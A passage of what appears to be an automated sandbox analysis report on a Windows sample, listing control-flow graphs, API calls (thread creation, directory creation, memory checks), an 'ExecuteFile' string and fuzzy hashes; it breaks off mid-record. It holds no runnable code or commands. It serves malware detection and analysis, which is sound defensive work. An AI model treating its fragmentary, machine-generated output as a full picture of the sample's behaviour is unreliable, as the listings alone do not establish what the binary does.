                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@
                                                                                                        • String ID: IA$IA
                                                                                                        • API String ID: 1033339047-1400641299
                                                                                                        • Opcode ID: 7402ad71c3df89009bcca6447dc192685c66d640a39f4103aae4a4fab3f3137f
                                                                                                        • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                                                        • Opcode Fuzzy Hash: 7402ad71c3df89009bcca6447dc192685c66d640a39f4103aae4a4fab3f3137f
                                                                                                        • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1124 410cd0-410d1a call 410b9a free 1127 410d22-410d23 1124->1127 1128 410d1c-410d1e 1124->1128 1128->1127
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID: $KA$4KA$HKA$\KA
                                                                                                        • API String ID: 1294909896-3316857779
                                                                                                        • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                        • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                                                        • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                        • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1129 4096c7-40970f _EH_prolog call 4010e2 1132 409711-409714 1129->1132 1133 409717-40971a 1129->1133 1132->1133 1134 409730-409755 1133->1134 1135 40971c-409721 1133->1135 1138 409757-40975d 1134->1138 1136 409723-409725 1135->1136 1137 409729-40972b 1135->1137 1136->1137 1139 409b93-409ba4 1137->1139 1140 409763-409767 1138->1140 1141 409827-40983a call 40118a 1138->1141 1142 409769-40976c 1140->1142 1143 40976f-40977e 1140->1143 1150 409851-409876 call 408e4e ??2@YAPAXI@Z 1141->1150 1151 40983c-409846 call 409425 1141->1151 1142->1143 1144 409780-409796 call 4094e0 call 40969d call 40e959 1143->1144 1145 4097a3-4097a8 1143->1145 1166 40979b-4097a1 1144->1166 1148 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1145->1148 1149 4097aa-4097b4 1145->1149 1154 4097f3-409809 1148->1154 1149->1148 1149->1154 1162 409881-40989a call 4010e2 call 40eb24 1150->1162 1163 409878-40987f call 40ebf7 1150->1163 1173 40984a-40984c 1151->1173 1159 40980c-409814 1154->1159 1165 409816-409825 call 409403 1159->1165 1159->1166 1183 40989d-4098c0 call 40eb19 1162->1183 1163->1162 1165->1159 1166->1138 1173->1139 1186 4098c2-4098c7 1183->1186 1187 4098f6-4098f9 1183->1187 1190 4098c9-4098cb 1186->1190 1191 4098cf-4098e7 call 409530 call 409425 1186->1191 1188 409925-409949 ??2@YAPAXI@Z 1187->1188 1189 4098fb-409900 1187->1189 1193 409954 1188->1193 1194 40994b-409952 call 409c13 1188->1194 1195 409902-409904 1189->1195 1196 409908-40991e call 409530 call 409425 1189->1196 1190->1191 1209 4098e9-4098eb 1191->1209 1210 4098ef-4098f1 1191->1210 1199 409956-40996d call 4010e2 1193->1199 1194->1199 1195->1196 1196->1188 1211 40997b-4099a0 call 409fb4 1199->1211 1212 40996f-409978 1199->1212 1209->1210 1210->1139 1215 4099a2-4099a7 1211->1215 1216 4099e3-4099e6 1211->1216 1212->1211 1219 4099a9-4099ab 1215->1219 1220 4099af-4099b4 1215->1220 1217 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1216->1217 1218 409b4e-409b53 1216->1218 1234 409a4e-409a53 1217->1234 1223 409b55-409b56 1218->1223 1224 409b5b-409b7f 1218->1224 1219->1220 1221 4099b6-4099b8 1220->1221 1222 4099bc-4099d4 call 409530 call 409425 1220->1222 1221->1222 1235 4099d6-4099d8 1222->1235 1236 4099dc-4099de 1222->1236 1223->1224 1224->1183 1237 409ab5-409abb 1234->1237 1238 409a55 1234->1238 1235->1236 1236->1139 1240 409ac1-409ac3 1237->1240 1241 409abd-409abf 1237->1241 1239 409a57 1238->1239 1242 409a5a-409a63 call 409f49 1239->1242 1243 409a65-409a67 1240->1243 1244 409ac5-409ad1 1240->1244 1241->1239 1242->1243 1255 409aa2-409aa4 1242->1255 1246 409a69-409a6a 1243->1246 1247 409a6f-409a71 1243->1247 1248 409ad3-409ad5 1244->1248 1249 409ad7-409add 1244->1249 1246->1247 1252 409a73-409a75 1247->1252 1253 409a79-409a91 call 409530 call 409425 1247->1253 1248->1242 1249->1224 1250 409adf-409ae5 1249->1250 1250->1224 1252->1253 1253->1173 1262 409a97-409a9d 1253->1262 1258 409aa6-409aa8 1255->1258 1259 409aac-409ab0 1255->1259 1258->1259 1259->1224 1262->1173
                                                                                                        APIs
                                                                                                        • _EH_prolog.MSVCRT ref: 004096D0
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                                                          • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$H_prolog
                                                                                                        • String ID: HIA
                                                                                                        • API String ID: 3431946709-2712174624
                                                                                                        • Opcode ID: 3dcc1a3fe120ce7f2c594cfa04f860259f569253507d2a08ae97171331bd6f56
                                                                                                        • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                                                        • Opcode Fuzzy Hash: 3dcc1a3fe120ce7f2c594cfa04f860259f569253507d2a08ae97171331bd6f56
                                                                                                        • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1265 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1269 402893-4028af call 40dcc7 1265->1269 1271 4028b5-4028ba 1269->1271 1272 40297f 1269->1272 1271->1272 1273 4028c0-4028ca 1271->1273 1274 402981-402985 1272->1274 1275 4028cd-4028d2 1273->1275 1276 402911-402916 1275->1276 1277 4028d4-4028d9 1275->1277 1278 40293b-40295f memmove 1276->1278 1280 402918-40292b memcmp 1276->1280 1277->1278 1279 4028db-4028ee memcmp 1277->1279 1285 402961-402968 1278->1285 1286 40296e-402979 1278->1286 1281 4028f4-4028fe 1279->1281 1282 40297b-40297d 1279->1282 1283 40290b-40290f 1280->1283 1284 40292d-402939 1280->1284 1281->1272 1287 402900-402906 call 402640 1281->1287 1282->1274 1283->1275 1284->1275 1285->1286 1288 402890 1285->1288 1286->1274 1287->1283 1288->1269
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                        • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                        • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                        • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlenmemcmp$memmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 3251180759-0
                                                                                                        • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                        • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                                                        • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                        • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1292 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1299 401563 call 40786b 1292->1299 1300 401568-401583 WaitForSingleObject 1292->1300 1299->1300 1302 401585-401588 1300->1302 1303 4015b7-4015bd 1300->1303 1306 40158a-40158d 1302->1306 1307 4015ab 1302->1307 1304 40161b 1303->1304 1305 4015bf-4015d4 GetExitCodeThread 1303->1305 1309 401620-401623 1304->1309 1310 4015d6-4015d8 1305->1310 1311 4015de-4015e9 1305->1311 1312 4015a7-4015a9 1306->1312 1313 40158f-401592 1306->1313 1308 4015ad-4015b5 call 407776 1307->1308 1308->1304 1310->1311 1315 4015da-4015dc 1310->1315 1316 4015f1-4015fa 1311->1316 1317 4015eb-4015ec 1311->1317 1312->1308 1318 4015a3-4015a5 1313->1318 1319 401594-401597 1313->1319 1315->1309 1322 401605-401611 SetLastError 1316->1322 1323 4015fc-401603 1316->1323 1321 4015ee-4015ef 1317->1321 1318->1308 1324 401599-40159c 1319->1324 1325 40159e-4015a1 1319->1325 1326 401613-401618 call 407776 1321->1326 1322->1326 1323->1304 1323->1322 1324->1304 1324->1325 1325->1321 1326->1304
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                                                        • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                                                          • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                          • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                          • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                          • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                          • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 359084233-0
                                                                                                        • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                        • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                                                        • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                        • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1329 401986-401995 CreateDirectoryW 1330 4019c7-4019cb 1329->1330 1331 401997-4019a4 GetLastError 1329->1331 1332 4019b1-4019be GetFileAttributesW 1331->1332 1333 4019a6 1331->1333 1332->1330 1335 4019c0-4019c2 1332->1335 1334 4019a7-4019b0 SetLastError 1333->1334 1335->1330 1336 4019c4-4019c5 1335->1336 1336->1334
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                                                        • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 635176117-0
                                                                                                        • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                        • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                                                        • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                        • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1337 404a44-404a62 call 408676 ??2@YAPAXI@Z 1340 404a64-404a6b call 40a9f8 1337->1340 1341 404a6d 1337->1341 1343 404a6f-404a91 call 408726 call 40dcfb 1340->1343 1341->1343 1370 404a92 call 40b2fc 1343->1370 1371 404a92 call 40a7de 1343->1371 1348 404a95-404a97 1349 404ab3-404abd 1348->1349 1350 404a99-404aa9 call 407776 1348->1350 1352 404ada-404ae4 ??2@YAPAXI@Z 1349->1352 1353 404abf-404ac1 call 403354 1349->1353 1366 404aae-404ab2 1350->1366 1354 404ae6-404aed call 404292 1352->1354 1355 404aef 1352->1355 1360 404ac6-404ac9 1353->1360 1359 404af1-404af6 call 40150b 1354->1359 1355->1359 1365 404afb-404afd 1359->1365 1360->1352 1364 404acb 1360->1364 1367 404ad0-404ad8 1364->1367 1365->1367 1367->1366 1370->1348 1371->1348
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000021,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@
                                                                                                        • String ID: ExecuteFile
                                                                                                        • API String ID: 1033339047-323923146
                                                                                                        • Opcode ID: ddddc352d45356e59f769561758ce12b54d09949a17630eb614c7359ca8f5a4f
                                                                                                        • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                                                        • Opcode Fuzzy Hash: ddddc352d45356e59f769561758ce12b54d09949a17630eb614c7359ca8f5a4f
                                                                                                        • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                        • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 3828600508-0
                                                                                                        • Opcode ID: 05f36dbfb7a58d9fcd8f34d107677a54faebb06990fcd4d8571633681916b41d
                                                                                                        • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                                                        • Opcode Fuzzy Hash: 05f36dbfb7a58d9fcd8f34d107677a54faebb06990fcd4d8571633681916b41d
                                                                                                        • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                                                        APIs
                                                                                                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                        • Opcode ID: 5ff2dfdd56dec2a5a5c377c1c31be187797b995f0c54d640c9ef9d6a9fd1637f
                                                                                                        • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                                                        • Opcode Fuzzy Hash: 5ff2dfdd56dec2a5a5c377c1c31be187797b995f0c54d640c9ef9d6a9fd1637f
                                                                                                        • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                                                          • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                          • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                          • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 4269121280-0
                                                                                                        • Opcode ID: d1d5542d106b2cdafdaa32fb19a738a2b8d61d2174dbe5d07d94aeecd6dafa49
                                                                                                        • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                                                        • Opcode Fuzzy Hash: d1d5542d106b2cdafdaa32fb19a738a2b8d61d2174dbe5d07d94aeecd6dafa49
                                                                                                        • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@H_prolog
                                                                                                        • String ID:
                                                                                                        • API String ID: 1329742358-0
                                                                                                        • Opcode ID: 022c29a744621237163180da95b687a83dd35658c2d9e2dd944db09434d0a69c
                                                                                                        • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                                                        • Opcode Fuzzy Hash: 022c29a744621237163180da95b687a83dd35658c2d9e2dd944db09434d0a69c
                                                                                                        • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
